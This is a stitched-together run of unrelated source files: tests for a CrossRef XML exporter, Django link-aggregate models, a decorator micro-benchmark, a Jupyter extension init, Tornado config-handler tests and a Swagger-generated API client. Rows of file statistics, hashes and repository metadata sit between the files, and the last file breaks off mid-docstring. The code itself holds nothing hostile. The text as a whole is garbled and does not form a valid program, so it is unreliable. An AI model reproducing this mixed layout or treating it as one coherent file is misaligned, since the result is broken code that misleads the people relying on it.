self.assertEqual(
'doi', intra_work_relation.attrib.get('identifier-type'))
self.assertEqual(
'isTranslationOf',
intra_work_relation.attrib.get('relationship-type'))
def test_collection_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'], 'doi_data')
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLCollectionPipe()
raw, xml = xmlcrossref.transform(data)
texts = [
"http://www.scielo.br/pdf/rsp/v44n4/07.pdf",
"http://www.scielo.br/pdf/rsp/v44n4/es_07.pdf",
]
self.assertEqual(
2, len(xml.findall('.//doi_data//collection')))
for res, text in zip(
xml.findall('.//doi_data/collection/item/resource'), texts):
with self.subTest(text):
self.assertEqual(res.text, text)
def test_citations_for_multilingue_document(self):
xmlcrossref = create_xmlcrossref_with_n_journal_article_element(
['pt', 'es'])
data = [self._article, xmlcrossref]
xmlcrossref = export_crossref.XMLArticleCitationsPipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
2, len(xml.findall('.//journal_article//citation_list')))
class ExportCrossRef_XMLArticlePubDatePipe_Tests(unittest.TestCase):
def setUp(self):
self.xmlcrossref = ET.Element('doi_batch')
journal_article = ET.Element('journal_article')
journal_article.set('publication_type', 'full_text')
journal = ET.Element('journal')
journal.append(journal_article)
body = ET.Element('body')
body.append(journal)
self.xmlcrossref.append(body)
def test_article_publication_date_element_aop_article(self):
_raw_json = {
'issue': {
'issue': {'v32': [{'_': 'ahead'}]},
},
'article': {
'v32': [{'_': 'ahead'}],
'v223': [{'_': '20190325'}],
},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><month>03</month><day>25</day><year>2019</year></publication_date></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
def test_article_publication_date_element_issue_article(self):
_raw_json = {
'issue': {
'issue': {'v32': [{'_': '10'}]},
},
'article': {
'v32': [{'_': '10'}],
'v65': [{'_': '20190300'}],
},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><month>03</month><year>2019</year></publication_date></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
def test_article_publication_date_element_continuospub_article(self):
_raw_json = {
'issue': {
'issue': {'v32': [{'_': '10'}]},
},
'article': {
'v32': [{'_': '10'}],
'v65': [{'_': '20190000'}],
},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
xmlcrossref = export_crossref.XMLArticlePubDatePipe()
raw, xml = xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_article publication_type="full_text"><publication_date media_type="online"><year>2019</year></publication_date></journal_article></journal></body></doi_batch>',
ET.tostring(xml)
)
class ExportCrossRef_XMLIssuePipe_Tests(unittest.TestCase):
def setUp(self):
self.xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
self.xmlcrossref.append(body)
def test_aop_element(self):
_raw_json = {
'issue':
{'issue':
{'v32': [{'_': 'ahead'}]},
},
'article':
{'v32': [{'_': 'ahead'}]},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
_xmlcrossref = export_crossref.XMLIssuePipe()
raw, xml = _xmlcrossref.transform(data)
self.assertEqual(xml.find('.//journal_issue/issue'), None)
self.assertEqual(
b'<doi_batch><body><journal><journal_issue/></journal></body></doi_batch>',
ET.tostring(xml))
def test_issue_element(self):
_raw_json = {
'issue':
{'issue':
{'v32': [{'_': '10'}]},
},
'article':
{'v32': [{'_': '10'}]},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
_xmlcrossref = export_crossref.XMLIssuePipe()
raw, xml = _xmlcrossref.transform(data)
self.assertEqual(xml.findtext('.//journal_issue/issue'), '10')
self.assertEqual(
b'<doi_batch><body><journal><journal_issue><issue>10</issue></journal_issue></journal></body></doi_batch>',
ET.tostring(xml))
class ExportCrossRef_XMLVolumePipe_Tests(unittest.TestCase):
def setUp(self):
self.xmlcrossref = ET.Element('doi_batch')
journal = ET.Element('journal')
journal.append(ET.Element('journal_issue'))
body = ET.Element('body')
body.append(journal)
self.xmlcrossref.append(body)
def test_aop_element(self):
_raw_json = {
'issue':
{'issue':
{'v32': [{'_': 'ahead'}]},
},
'article':
{'v32': [{'_': 'ahead'}]},
}
_article = Article(_raw_json)
data = [_article, self.xmlcrossref]
_xmlcrossref = export_crossref.XMLVolumePipe()
raw, xml = _xmlcrossref.transform(data)
self.assertEqual(
b'<doi_batch><body><journal><journal_issue/></journal></body></doi_batch>',
ET.tostring(xml))
| 43.545256
| 2,385
| 0.586361
| 8,173
| 79,862
| 5.558424
| 0.092867
| 0.05054
| 0.03632
| 0.039226
| 0.930639
| 0.924894
| 0.917101
| 0.907086
| 0.898545
| 0.890621
| 0
| 0.038617
| 0.30286
| 79,862
| 1,833
| 2,386
| 43.569013
| 0.777351
| 0.000563
| 0
| 0.727398
| 0
| 0.024155
| 0.36063
| 0.101324
| 0
| 0
| 0
| 0
| 0.089717
| 1
| 0.05245
| false
| 0
| 0.005521
| 0
| 0.063492
| 0.00069
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9a5de7c69ca47746f671c8f377583780d564ee89
| 5,603
|
py
|
Python
|
extlinks/aggregates/models.py
|
suecarmol/externallinks
|
388771924f0e0173237393226cb7549a02ae40e3
|
[
"MIT"
] | 6
|
2019-12-05T13:14:45.000Z
|
2022-03-13T18:22:00.000Z
|
extlinks/aggregates/models.py
|
WikipediaLibrary/externallinks
|
6519719a8b01ab121bf77c465c587af3762e99af
|
[
"MIT"
] | 97
|
2019-07-01T14:42:51.000Z
|
2022-03-29T04:09:34.000Z
|
extlinks/aggregates/models.py
|
suecarmol/externallinks
|
388771924f0e0173237393226cb7549a02ae40e3
|
[
"MIT"
] | 8
|
2019-12-03T01:52:41.000Z
|
2020-08-19T00:26:46.000Z
|
from django.db import models
from django.core.exceptions import ValidationError
from extlinks.organisations.models import Collection, Organisation
class LinkAggregate(models.Model):
class Meta:
app_label = "aggregates"
indexes = [
models.Index(fields=["full_date"]),
models.Index(fields=["collection"]),
models.Index(fields=["organisation"]),
]
organisation = models.ForeignKey(Organisation, on_delete=models.CASCADE)
collection = models.ForeignKey(
Collection, on_delete=models.CASCADE, blank=False, null=False
)
day = models.PositiveIntegerField()
month = models.PositiveIntegerField()
year = models.PositiveIntegerField()
full_date = models.DateField()
total_links_added = models.PositiveIntegerField()
total_links_removed = models.PositiveIntegerField()
on_user_list = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def save(self, *args, **kwargs):
self.day = self.full_date.day
self.month = self.full_date.month
self.year = self.full_date.year
if self.pk is None:
self.full_clean(validate_unique=True)
super().save(*args, **kwargs)
def validate_unique(self, *args, **kwargs):
super(LinkAggregate, self).validate_unique(*args, **kwargs)
if self.__class__.objects.filter(
organisation=self.organisation,
collection=self.collection,
full_date=self.full_date,
on_user_list=self.on_user_list,
).exists():
raise ValidationError(
message="LinkAggregate with this combination (organisation, collection, full_date, on_user_list) already exists.",
code="unique_together",
)
class UserAggregate(models.Model):
class Meta:
app_label = "aggregates"
indexes = [
models.Index(fields=["full_date"]),
models.Index(fields=["collection"]),
models.Index(fields=["organisation"]),
]
organisation = models.ForeignKey(Organisation, on_delete=models.CASCADE)
collection = models.ForeignKey(
Collection, on_delete=models.CASCADE, blank=False, null=False
)
username = models.CharField(max_length=235)
day = models.PositiveIntegerField()
month = models.PositiveIntegerField()
year = models.PositiveIntegerField()
full_date = models.DateField()
total_links_added = models.PositiveIntegerField()
total_links_removed = models.PositiveIntegerField()
on_user_list = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def save(self, *args, **kwargs):
self.day = self.full_date.day
self.month = self.full_date.month
self.year = self.full_date.year
if self.pk is None:
self.full_clean(validate_unique=True)
super().save(*args, **kwargs)
def validate_unique(self, *args, **kwargs):
super().validate_unique(*args, **kwargs)
if self.__class__.objects.filter(
organisation=self.organisation,
collection=self.collection,
username=self.username,
full_date=self.full_date,
on_user_list=self.on_user_list,
).exists():
raise ValidationError(
message="UserAggregate with this combination (organisation, collection, username, full_date, on_user_list) already exists.",
code="unique_together",
)
class PageProjectAggregate(models.Model):
class Meta:
app_label = "aggregates"
indexes = [
models.Index(fields=["full_date"]),
models.Index(fields=["collection"]),
models.Index(fields=["organisation"]),
]
organisation = models.ForeignKey(Organisation, on_delete=models.CASCADE)
collection = models.ForeignKey(
Collection, on_delete=models.CASCADE, blank=False, null=False
)
project_name = models.CharField(max_length=32)
page_name = models.CharField(max_length=255)
day = models.PositiveIntegerField()
month = models.PositiveIntegerField()
year = models.PositiveIntegerField()
full_date = models.DateField()
total_links_added = models.PositiveIntegerField()
total_links_removed = models.PositiveIntegerField()
on_user_list = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def save(self, *args, **kwargs):
self.day = self.full_date.day
self.month = self.full_date.month
self.year = self.full_date.year
if self.pk is None:
self.full_clean(validate_unique=True)
super().save(*args, **kwargs)
def validate_unique(self, *args, **kwargs):
super().validate_unique(*args, **kwargs)
if self.__class__.objects.filter(
organisation=self.organisation,
collection=self.collection,
project_name=self.project_name,
page_name=self.page_name,
full_date=self.full_date,
on_user_list=self.on_user_list,
).exists():
raise ValidationError(
message="PageProjectAggregate with this combination (organisation, collection, project_name, page_name, full_date, on_user_list) already exists.",
code="unique_together",
)
| 37.604027
| 162
| 0.659825
| 598
| 5,603
| 5.978261
| 0.147157
| 0.053706
| 0.033566
| 0.035245
| 0.892028
| 0.841958
| 0.841958
| 0.841958
| 0.841958
| 0.841958
| 0
| 0.001868
| 0.235588
| 5,603
| 148
| 163
| 37.858108
| 0.832827
| 0
| 0
| 0.806202
| 0
| 0
| 0.092629
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.023256
| 0
| 0.395349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9a6bcaf42692e310dc142762f867f7428785be47
| 119
|
py
|
Python
|
data/micro-benchmark/decorators/nested/main.py
|
vitsalis/pycg-evaluation
|
ce37eb5668465b0c17371914e863d699826447ee
|
[
"Apache-2.0"
] | 121
|
2020-12-16T20:31:37.000Z
|
2022-03-21T20:32:43.000Z
|
data/micro-benchmark/decorators/nested/main.py
|
vitsalis/pycg-evaluation
|
ce37eb5668465b0c17371914e863d699826447ee
|
[
"Apache-2.0"
] | 24
|
2021-03-13T00:04:00.000Z
|
2022-03-21T17:28:11.000Z
|
data/micro-benchmark/decorators/nested/main.py
|
vitsalis/pycg-evaluation
|
ce37eb5668465b0c17371914e863d699826447ee
|
[
"Apache-2.0"
] | 19
|
2021-03-23T10:58:47.000Z
|
2022-03-24T19:46:50.000Z
|
def dec(f):
return f
def func():
def dec(f):
return f
@dec
def inner():
pass
func()
| 9.153846
| 16
| 0.453782
| 17
| 119
| 3.176471
| 0.411765
| 0.222222
| 0.259259
| 0.481481
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.420168
| 119
| 12
| 17
| 9.916667
| 0.782609
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.111111
| 0
| 0.222222
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
|
0
| 7
|
d01475b7b2ff72446fbbac93ff7a1c97ebffb2e4
| 152
|
py
|
Python
|
notebooks/data-prep/config.py
|
HPI-Information-Systems/TimeEval
|
9b2717b89decd57dd09e04ad94c120f13132d7b8
|
[
"MIT"
] | 2
|
2022-01-29T03:46:31.000Z
|
2022-02-14T14:06:35.000Z
|
notebooks/data-prep/config.py
|
HPI-Information-Systems/TimeEval
|
9b2717b89decd57dd09e04ad94c120f13132d7b8
|
[
"MIT"
] | null | null | null |
notebooks/data-prep/config.py
|
HPI-Information-Systems/TimeEval
|
9b2717b89decd57dd09e04ad94c120f13132d7b8
|
[
"MIT"
] | null | null | null |
data_raw_folder = "/home/projects/akita/data/benchmark-data/data-raw"
data_processed_folder = "/home/projects/akita/data/benchmark-data/data-processed"
| 50.666667
| 81
| 0.815789
| 22
| 152
| 5.454545
| 0.363636
| 0.116667
| 0.3
| 0.383333
| 0.733333
| 0.733333
| 0.733333
| 0.733333
| 0
| 0
| 0
| 0
| 0.039474
| 152
| 2
| 82
| 76
| 0.821918
| 0
| 0
| 0
| 0
| 0
| 0.684211
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d04fcf61c379ceb0f7e8fc287381cb8f01f2baf0
| 491
|
py
|
Python
|
phoila/__init__.py
|
datalayer-contrib/phoila
|
f8ff5f0a1f807829b57deae9f72bed91908258ad
|
[
"BSD-3-Clause"
] | 10
|
2019-08-09T14:45:49.000Z
|
2020-03-30T12:48:05.000Z
|
phoila/__init__.py
|
datalayer-contrib/phoila
|
f8ff5f0a1f807829b57deae9f72bed91908258ad
|
[
"BSD-3-Clause"
] | 9
|
2019-08-09T17:07:45.000Z
|
2019-10-22T18:22:09.000Z
|
phoila/__init__.py
|
datalayer-contrib/phoila
|
f8ff5f0a1f807829b57deae9f72bed91908258ad
|
[
"BSD-3-Clause"
] | 5
|
2019-08-09T17:57:53.000Z
|
2019-10-22T12:14:14.000Z
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Vidar Tonaas Fauske.
# Distributed under the terms of the Modified BSD License.
from ._version import __version__, version_info
def load_jupyter_server_extension(nb_server_app):
# Wrap this here to avoid pulling in webapp in a normal run
from .server_extension import _load_jupyter_server_extension
_load_jupyter_server_extension(nb_server_app)
def _jupyter_server_extension_paths():
return [{"module": "phoila"}]
| 25.842105
| 64
| 0.778004
| 70
| 491
| 5.085714
| 0.657143
| 0.210674
| 0.247191
| 0.219101
| 0.207865
| 0.207865
| 0.207865
| 0
| 0
| 0
| 0
| 0.002398
| 0.150713
| 491
| 18
| 65
| 27.277778
| 0.851319
| 0.374745
| 0
| 0
| 0
| 0
| 0.039735
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.166667
| 0.833333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d0567b824e9a22b6de4e6f96cdb67ccb0d8a7c4b
| 5,994
|
py
|
Python
|
nebula/tests/test_config_custom.py
|
threathunterX/nebula_web
|
2e32e6e7b225e0bd87ee8c847c22862f12c51bb1
|
[
"Apache-2.0"
] | 2
|
2019-05-01T09:42:32.000Z
|
2019-05-31T01:08:37.000Z
|
nebula/tests/test_config_custom.py
|
threathunterX/nebula_web
|
2e32e6e7b225e0bd87ee8c847c22862f12c51bb1
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:30:04.000Z
|
2021-06-01T23:30:04.000Z
|
nebula/tests/test_config_custom.py
|
threathunterX/nebula_web
|
2e32e6e7b225e0bd87ee8c847c22862f12c51bb1
|
[
"Apache-2.0"
] | 5
|
2019-05-14T09:30:12.000Z
|
2020-09-29T04:57:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from sqlalchemy.orm import sessionmaker
from nebula.views import config
from nebula.dao.config_dao import ConfigCustDao, ConfigDefaultDao
from base import WebTestCase, wsgi_safe, Auth_Code
configs = [
{
"last_modified": 1497421508806,
"value": "did",
"key": "sniffer.did.keyset"
}
]
# global application scope. create Session class, engine
Session = sessionmaker()
@wsgi_safe
class TestCustomConfigListHandler(WebTestCase):
def get_handlers(self):
return [(r"/platform/config", config.ConfigListHandler)]
@classmethod
def setUpClass(cls):
super(TestCustomConfigListHandler, cls).setUpClass()
cls.default_dao = ConfigDefaultDao()
cls.custom_dao = ConfigCustDao()
cls.default_dao.clear()
cls.custom_dao.clear()
def tearDown(self):
self.default_dao.clear()
self.custom_dao.clear()
def test_add_configs(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
url = "/platform/config?auth={}".format(Auth_Code)
post_args = json.dumps(configs)
response = self.fetch(url, method='POST', body=post_args)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 1)
def test_get_configs(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config?auth={}".format(Auth_Code)
response = self.fetch(url)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(len(res['values']), 1)
def test_delete_configs(self):
for c in configs:
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config?auth={}".format(Auth_Code)
response = self.fetch(url, method='DELETE')
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 0)
class TestCustomConfigPropertiesHandler(WebTestCase):
def get_handlers(self):
return [(r"/platform/configproperties", config.ConfigPropertiesHandler)]
@classmethod
def setUpClass(cls):
super(TestCustomConfigPropertiesHandler, cls).setUpClass()
cls.default_dao = ConfigDefaultDao()
cls.custom_dao = ConfigCustDao()
cls.default_dao.clear()
cls.custom_dao.clear()
def tearDown(self):
self.default_dao.clear()
self.custom_dao.clear()
def test_add_configproperties(self):
configproperties = "\n".join(
["{}={}".format(_["key"], _["value"]) for _ in configs])
url = "/platform/configproperties?auth={}".format(Auth_Code)
response = self.fetch(url, method='POST', body=configproperties)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 1)
def test_get_configproperties(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
self.custom_dao.add_config(c['key'], c['value'])
configproperties = "\n".join(
["{}={}".format(_["key"], _["value"]) for _ in configs])
url = "/platform/configproperties?auth={}".format(Auth_Code)
response = self.fetch(url)
self.assertEqual(response.body, configproperties)
def test_delete_configproperties(self):
for c in configs:
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/configproperties?auth={}".format(Auth_Code)
response = self.fetch(url, method='DELETE')
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 0)
class TestCustomConfigHandler(WebTestCase):
def get_handlers(self):
return [(r"/platform/config/(.*)", config.ConfigHandler)]
@classmethod
def setUpClass(cls):
super(TestCustomConfigHandler, cls).setUpClass()
cls.default_dao = ConfigDefaultDao()
cls.custom_dao = ConfigCustDao()
cls.default_dao.clear()
cls.custom_dao.clear()
def tearDown(self):
self.default_dao.clear()
self.custom_dao.clear()
def test_add_config(self):
url = "/platform/config/{}?auth={}".format(
configs[0]['key'], Auth_Code)
post_args = json.dumps(configs[0])
response = self.fetch(url, method="POST", body=post_args)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 1)
def test_get_config(self):
for c in configs:
self.default_dao.add_config(c['key'], c['value'])
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config/{}?auth={}".format(
configs[0]['key'], Auth_Code)
response = self.fetch(url)
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(len(res['values']), 1)
def test_delete_config(self):
for c in configs:
self.custom_dao.add_config(c['key'], c['value'])
url = "/platform/config/{}?auth={}".format(
configs[0]['key'], Auth_Code)
response = self.fetch(url, method='DELETE')
res = json.loads(response.body)
self.assertEqual(res['status'], 0)
self.assertEqual(res['msg'], 'ok')
self.assertEqual(self.custom_dao.count(), 0)
| 33.864407
| 80
| 0.619453
| 699
| 5,994
| 5.184549
| 0.130186
| 0.103477
| 0.07947
| 0.035872
| 0.813466
| 0.786976
| 0.786976
| 0.75745
| 0.745309
| 0.745309
| 0
| 0.007362
| 0.229563
| 5,994
| 176
| 81
| 34.056818
| 0.777393
| 0.01635
| 0
| 0.726619
| 0
| 0
| 0.103343
| 0.051247
| 0
| 0
| 0
| 0
| 0.179856
| 1
| 0.129496
| false
| 0
| 0.035971
| 0.021583
| 0.208633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d0594825bfb56f90c5cef5a8c91e4bfecd645256
| 89
|
py
|
Python
|
automate/__main__.py
|
alexflorez/test_api_cypress
|
bda6bf113bf861afbd9226c8a04e7bab0f2aebaf
|
[
"BSD-3-Clause"
] | null | null | null |
automate/__main__.py
|
alexflorez/test_api_cypress
|
bda6bf113bf861afbd9226c8a04e7bab0f2aebaf
|
[
"BSD-3-Clause"
] | null | null | null |
automate/__main__.py
|
alexflorez/test_api_cypress
|
bda6bf113bf861afbd9226c8a04e7bab0f2aebaf
|
[
"BSD-3-Clause"
] | null | null | null |
from automate import install_cypress, run_api_server
install_cypress()
run_api_server()
| 17.8
| 52
| 0.853933
| 13
| 89
| 5.384615
| 0.615385
| 0.4
| 0.485714
| 0.571429
| 0.742857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 89
| 4
| 53
| 22.25
| 0.864198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d08f7d68fe6e75f8d652d41f8644b192b4c876ca
| 47,292
|
py
|
Python
|
timelight_ai_python_api_client/api/day_trend_api.py
|
timelight-ai/python-api-client
|
7e14341a89e8b7e1b4b0730416f6ddd3ef66ef39
|
[
"MIT"
] | null | null | null |
timelight_ai_python_api_client/api/day_trend_api.py
|
timelight-ai/python-api-client
|
7e14341a89e8b7e1b4b0730416f6ddd3ef66ef39
|
[
"MIT"
] | null | null | null |
timelight_ai_python_api_client/api/day_trend_api.py
|
timelight-ai/python-api-client
|
7e14341a89e8b7e1b4b0730416f6ddd3ef66ef39
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
timelight
This is the timelight api. # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from timelight_ai_python_api_client.api_client import ApiClient
class DayTrendApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v1_day_trend_bulk_post(self, generated_day_trend_bulk_dto, **kwargs): # noqa: E501
"""Create many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_bulk_post(generated_day_trend_bulk_dto, async_req=True)
>>> result = thread.get()
:param async_req bool
:param GeneratedDayTrendBulkDto generated_day_trend_bulk_dto: (required)
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_bulk_post_with_http_info(generated_day_trend_bulk_dto, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_bulk_post_with_http_info(generated_day_trend_bulk_dto, **kwargs) # noqa: E501
return data
def v1_day_trend_bulk_post_with_http_info(self, generated_day_trend_bulk_dto, **kwargs): # noqa: E501
"""Create many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_bulk_post_with_http_info(generated_day_trend_bulk_dto, async_req=True)
>>> result = thread.get()
:param async_req bool
:param GeneratedDayTrendBulkDto generated_day_trend_bulk_dto: (required)
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['generated_day_trend_bulk_dto'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_bulk_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'generated_day_trend_bulk_dto' is set
if ('generated_day_trend_bulk_dto' not in params or
params['generated_day_trend_bulk_dto'] is None):
raise ValueError("Missing the required parameter `generated_day_trend_bulk_dto` when calling `v1_day_trend_bulk_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'generated_day_trend_bulk_dto' in params:
body_params = params['generated_day_trend_bulk_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/bulk', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DayTrend]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_get(self, **kwargs): # noqa: E501
"""Retrieve many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str filter: <h4>Adds fields request condition (multiple conditions) to the request.</h4><i>Syntax:</i> <strong>?filter=field||condition||value</strong><br/><i>Examples:</i> <ul><li><strong>?filter=name||eq||batman</strong></li><li><strong>?filter=isVillain||eq||false&filter=city||eq||Arkham</strong> (multiple filters are treated as a combination of AND type of conditions)</li><li><strong>?filter=shots||in||12,26</strong> (some conditions accept multiple values separated by commas)</li><li><strong>?filter=power||isnull</strong> (some conditions don't accept value)</li></ul><br/>Filter Conditions:<ul><li><strong><code>eq</code></strong> (<code>=</code>, equal)</li><li><strong><code>ne</code></strong> (<code>!=</code>, not equal)</li><li><strong><code>gt</code></strong> (<code>></code>, greater than)</li><li><strong><code>lt</code></strong> (<code><</code>, lower that)</li><li><strong><code>gte</code></strong> (<code>>=</code>, greater than or equal)</li><li><strong><code>lte</code></strong> (<code><=</code>, lower than or equal)</li><li><strong><code>starts</code></strong> (<code>LIKE val%</code>, starts with)</li><li><strong><code>ends</code></strong> (<code>LIKE %val</code>, ends with)</li><li><strong><code>cont</code></strong> (<code>LIKE %val%</code>, contains)</li><li><strong><code>excl</code></strong> (<code>NOT LIKE %val%</code>, not contains)</li><li><strong><code>in</code></strong> (<code>IN</code>, in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>notin</code></strong> (<code>NOT IN</code>, not in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>isnull</code></strong> (<code>IS NULL</code>, is NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>notnull</code></strong> (<code>IS NOT NULL</code>, not NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>between</code></strong> (<code>BETWEEN</code>, between, 